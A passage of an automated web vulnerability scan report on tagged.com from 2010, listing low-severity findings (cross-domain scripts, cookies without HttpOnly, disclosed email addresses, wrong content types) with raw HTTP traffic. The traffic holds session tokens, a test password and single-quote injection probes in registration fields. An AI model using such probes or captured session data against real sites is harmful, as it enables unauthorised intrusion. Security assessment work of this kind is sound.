Cookie: __qca=P0-159294429-1293588622548; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); S=t4urklho6estviojs26it3hs07; connect_status=-1; __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmb=50703532.0.10.1293588625; __utmc=50703532
Content-Length: 457

email=h02332%40gmail.com&problem=2010&message=Hello-%0D%0A%0D%0AHoyt+LLC+Research+in+Boston%2C+MA%0D%0A%0D%0AWe+just+verified+CWE-79%2C+XSS+in+the+Registration+Form+and+other+parts+of+the+Web+Site.+If
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:32:34 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-FRAME-OPTIONS: DENY
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 11038

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - Contact</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>
<link rel="stylesheet" type="text/css"
...[SNIP]...
</link>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/yahoo/yahoo-min.js&2.8.0/build/event/event-min.js&2.8.0/build/dom/dom-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/p/Y7Ha01NCE.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/cookie/cookie-min.js&2.8.0/build/container/container_core-min.js&2.8.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/m/NjR_x7owD.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/connection/connection-min.js&2.8.0/build/json/json-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/X/ocZCEb-GY.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.8.0/build/container/container-min.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/g/l4XLT5pxV.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://x.tagstat.com/dyn/js/Z/3M_GuDH2l.js"></script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://www.google.com/recaptcha/api/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.16. http://www.tagged.com/terms_of_service.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /terms_of_service.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /terms_of_service.html HTTP/1.1
Host: www.tagged.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: connect_status=-1; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); S=t4urklho6estviojs26it3hs07; __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmc=50703532; __utmb=50703532.0.10.1293588625; __qca=P0-159294429-1293588622548;

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:18:34 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-FRAME-OPTIONS: DENY
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 58202

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - Terms of Service</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>
<link rel="stylesheet" type="
...[SNIP]...
</link>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/yahoo/yahoo-min.js&2.8.0/build/event/event-min.js&2.8.0/build/dom/dom-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/p/Y7Ha01NCE.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/connection/connection-min.js&2.8.0/build/json/json-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/w/I2aeGGB9R.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.8.0/build/container/container-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/9/RWYIg6Gl6.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/cookie/cookie-min.js&2.8.0/build/container/container_core-min.js&2.8.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/r/tBb3aD9XN.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://x.tagstat.com/dyn/js/5/BgrBVAnP8.js"></script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://www.google.com/recaptcha/api/js/recaptcha_ajax.js"></script>
...[SNIP]...

9. Cookie without HttpOnly flag set  previous  next
There are 2 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



9.1. http://www.tagged.com/logout.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /logout.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /logout.html HTTP/1.1
Host: www.tagged.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: connect_status=-1; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); S=t4urklho6estviojs26it3hs07; __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmc=50703532; __utmb=50703532.0.10.1293588625; __qca=P0-159294429-1293588622548;

Response

HTTP/1.1 302 Found
Date: Wed, 29 Dec 2010 02:18:56 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: S=csgcmen44cm4qi5r4hhhp4pqh5; path=/; domain=tagged.com
Set-Cookie: U=deleted; expires=Tue, 29-Dec-2009 02:18:55 GMT; path=/
Set-Cookie: U=deleted; expires=Tue, 29-Dec-2009 02:18:55 GMT; path=/; domain=.tagged.com
Set-Cookie: L=deleted; expires=Tue, 29-Dec-2009 02:18:55 GMT; path=/
Set-Cookie: L=deleted; expires=Tue, 29-Dec-2009 02:18:55 GMT; path=/; domain=.tagged.com
Set-Cookie: connect_status=deleted; expires=Tue, 29-Dec-2009 02:18:55 GMT; path=/
Set-Cookie: connect_status=deleted; expires=Tue, 29-Dec-2009 02:18:55 GMT; path=/; domain=.tagged.com
Set-Cookie: fbs_123049054388972=deleted; expires=Tue, 29-Dec-2009 02:18:55 GMT; path=/
Set-Cookie: fbs_123049054388972=deleted; expires=Tue, 29-Dec-2009 02:18:55 GMT; path=/; domain=.tagged.com
Location: http://www.tagged.com/index.html?r=%2Fhome.html
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


9.2. http://www.tagged.com/register.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /register.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /register.html HTTP/1.1
Host: www.tagged.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: connect_status=-1; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); S=t4urklho6estviojs26it3hs07; __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmc=50703532; __utmb=50703532.0.10.1293588625; __qca=P0-159294429-1293588622548;

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:18:44 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: S=j770r33jejke4i93clqofal2v2; path=/; domain=tagged.com
Set-Cookie: U=deleted; expires=Tue, 29-Dec-2009 02:18:43 GMT; path=/
Set-Cookie: U=deleted; expires=Tue, 29-Dec-2009 02:18:43 GMT; path=/; domain=.tagged.com
Set-Cookie: L=deleted; expires=Tue, 29-Dec-2009 02:18:43 GMT; path=/
Set-Cookie: L=deleted; expires=Tue, 29-Dec-2009 02:18:43 GMT; path=/; domain=.tagged.com
Set-Cookie: connect_status=deleted; expires=Tue, 29-Dec-2009 02:18:43 GMT; path=/
Set-Cookie: connect_status=deleted; expires=Tue, 29-Dec-2009 02:18:43 GMT; path=/; domain=.tagged.com
Set-Cookie: fbs_123049054388972=deleted; expires=Tue, 29-Dec-2009 02:18:43 GMT; path=/
Set-Cookie: fbs_123049054388972=deleted; expires=Tue, 29-Dec-2009 02:18:43 GMT; path=/; domain=.tagged.com
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 29480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Tagged - Register</title>
<link rel="stylesheet" type="text/css
...[SNIP]...

10. Email addresses disclosed  previous  next
There are 10 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


10.1. http://www.tagged.com/account_info.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /account_info.html

Issue detail

The following email address was disclosed in the response:

Request

GET /account_info.html HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/home.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-159294429-1293588622548; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); S=t4urklho6estviojs26it3hs07; __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmb=50703532.0.10.1293588625; __utmc=50703532; connect_status=-1

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:16:03 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-FRAME-OPTIONS: DENY
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 78142

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - Account Info</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>
<link rel="stylesheet" type="text
...[SNIP]...
<p>Click on the link inside the confirmation email we sent to test@fastdial.net</p>
...[SNIP]...
<p class="summary" id="primary_email">test@fastdial.net</p>
...[SNIP]...

10.2. http://www.tagged.com/api/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /api/

Issue detail

The following email address was disclosed in the response:

Request

POST /api/?application_id=user&format=json&session_token=t4urklho6estviojs26it3hs07 HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/account_info.html
Origin: http://www.tagged.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-159294429-1293588622548; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); S=t4urklho6estviojs26it3hs07; __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmb=50703532.0.10.1293588625; __utmc=50703532; connect_status=-1
Content-Length: 65


method=tagged.account.getEmails&api_signature=&track=dgx456OR3u

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:16:06 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 162

["{\"stat\":\"ok\",\"diagnostics\":\"1 2.6 26.52\",\"result\":[{\"eaId\":129182575,\"string\":\"test@fastdial.net\",\"is_verified\":false,\"is_primary\":true}]}"]

10.3. http://www.tagged.com/browse.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /browse.html

Issue detail

The following email address was disclosed in the response:

Request

GET /browse.html HTTP/1.1
Host: www.tagged.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: connect_status=-1; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); S=t4urklho6estviojs26it3hs07; __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmc=50703532; __utmb=50703532.0.10.1293588625; __qca=P0-159294429-1293588622548;

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:18:43 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-FRAME-OPTIONS: DENY
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 29677

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - Browse</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>
<link rel="stylesheet" type="text/css"
...[SNIP]...
<p>Click on the link inside the confirmation email we sent to test@fastdial.net</p>
...[SNIP]...

10.4. http://www.tagged.com/find_groups.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /find_groups.html

Issue detail

The following email address was disclosed in the response:

Request

GET /find_groups.html HTTP/1.1
Host: www.tagged.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: connect_status=-1; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); S=t4urklho6estviojs26it3hs07; __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmc=50703532; __utmb=50703532.0.10.1293588625; __qca=P0-159294429-1293588622548;

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:18:43 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-FRAME-OPTIONS: DENY
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 92910

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - Find Groups</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>
<link rel="stylesheet" type="text/
...[SNIP]...
<p>Click on the link inside the confirmation email we sent to test@fastdial.net</p>
...[SNIP]...

10.5. http://www.tagged.com/help.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /help.html

Issue detail

The following email address was disclosed in the response:

Request

GET /help.html HTTP/1.1
Host: www.tagged.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: connect_status=-1; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); S=t4urklho6estviojs26it3hs07; __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmc=50703532; __utmb=50703532.0.10.1293588625; __qca=P0-159294429-1293588622548;

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:18:36 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-FRAME-OPTIONS: DENY
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 18417

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>
<link rel="stylesheet" type="text/css" href="htt
...[SNIP]...
<p>Click on the link inside the confirmation email we sent to test@fastdial.net</p>
...[SNIP]...

10.6. http://www.tagged.com/home.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /home.html

Issue detail

The following email address was disclosed in the response:

Request

GET /home.html HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-159294429-1293588622548; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmb=50703532.0.10.1293588625; __utmc=50703532; S=t4urklho6estviojs26it3hs07

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:14:59 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-FRAME-OPTIONS: DENY
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 37661

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - Home</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>
<link rel="stylesheet" type="text/css" hr
...[SNIP]...
<p>Click on the link inside the confirmation email we sent to test@fastdial.net</p>
...[SNIP]...

10.7. http://www.tagged.com/profile.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /profile.html

Issue detail

The following email address was disclosed in the response:

Request

GET /profile.html HTTP/1.1
Host: www.tagged.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: connect_status=-1; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); S=t4urklho6estviojs26it3hs07; __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmc=50703532; __utmb=50703532.0.10.1293588625; __qca=P0-159294429-1293588622548;

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:18:44 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-FRAME-OPTIONS: DENY
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 30381

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - My Profile</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>
<link rel="stylesheet" type="text/c
...[SNIP]...
<p>Click on the link inside the confirmation email we sent to test@fastdial.net</p>
...[SNIP]...

10.8. http://www.tagged.com/register.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /register.html

Issue detail

The following email address was disclosed in the response:

Request

POST /register.html?page=index HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/
Cache-Control: max-age=0
Origin: http://www.tagged.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=dvhiv3dhhk4sr6bc1ttavum794; __qca=P0-159294429-1293588622548; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmb=50703532.0.10.1293588625; __utmc=50703532
Content-Length: 409

firstName=%27&lastName=%27&gender=F&birthMonth=1&birthDay=1&birthYear=1970&country=US&city=&zipCode=10010&locale=en_US&email=test%40fastdial.net&password=SkipIt1&recaptcha_challenge_field=03AHJ_Vuvg3Y
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:18:36 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 29969

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Tagged - Register</title>
<link rel="stylesheet" type="text/
...[SNIP]...
<input type="text" name="email" value="test@fastdial.net" id="email" tabindex="3"/>
...[SNIP]...

10.9. http://www.tagged.com/safety.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /safety.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /safety.html HTTP/1.1
Host: www.tagged.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: connect_status=-1; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); S=t4urklho6estviojs26it3hs07; __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmc=50703532; __utmb=50703532.0.10.1293588625; __qca=P0-159294429-1293588622548;

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:18:36 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-FRAME-OPTIONS: DENY
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 23041

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - Safety, Security, and Privacy Overview</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>
<link r
...[SNIP]...
<p>Click on the link inside the confirmation email we sent to test@fastdial.net</p>
...[SNIP]...
<a href="mailto:safetysquad@tagged.com">
...[SNIP]...
<a href="mailto:parentcare@tagged.com">parentcare@tagged.com</a>
...[SNIP]...
<a href="mailto:lawenforcement@tagged.com">lawenforcement@tagged.com</a>
...[SNIP]...
<a href="mailto:safetysquad@tagged.com">safetysquad@tagged.com</a>
...[SNIP]...

10.10. http://www.tagged.com/terms_of_service.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /terms_of_service.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /terms_of_service.html HTTP/1.1
Host: www.tagged.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: connect_status=-1; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); S=t4urklho6estviojs26it3hs07; __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmc=50703532; __utmb=50703532.0.10.1293588625; __qca=P0-159294429-1293588622548;

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:18:34 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-FRAME-OPTIONS: DENY
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 58202

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - Terms of Service</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>
<link rel="stylesheet" type="
...[SNIP]...
<p>Click on the link inside the confirmation email we sent to test@fastdial.net</p>
...[SNIP]...
<a href="mailto:copyrightagent@tagged.com">copyrightagent@tagged.com</a>
...[SNIP]...
<a href="mailto:SiteSquad@Tagged.com">SiteSquad@Tagged.com</a>
...[SNIP]...

11. Content type incorrectly stated  previous
There are 2 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


11.1. http://www.tagged.com/api/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tagged.com
Path:   /api/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

POST /api/?application_id=user&format=json&session_token=dvhiv3dhhk4sr6bc1ttavum794 HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/
Origin: http://www.tagged.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=dvhiv3dhhk4sr6bc1ttavum794; __qca=P0-159294429-1293588622548; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmb=50703532.0.10.1293588625; __utmc=50703532
Content-Length: 162


method=tagged.reg.validate&ids=first_name%2Clast_name%2CzipCode%2Clocale%2Cemail%2Cpassword%2CtermsOfService%2C&values=%2C%2C%2Cen_US%2C%2C%2C%2C&api_signature=

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:11:37 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 129

["{\"stat\":\"ok\",\"diagnostics\":\"2 2.4 24.38\",\"results\":{\"id\":\"\",\"errors\":[\"1020\",\"1021\",\"1024\",1223,1227]}}"]

11.2. http://www.tagged.com/favicon.ico  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tagged.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Accept: */*
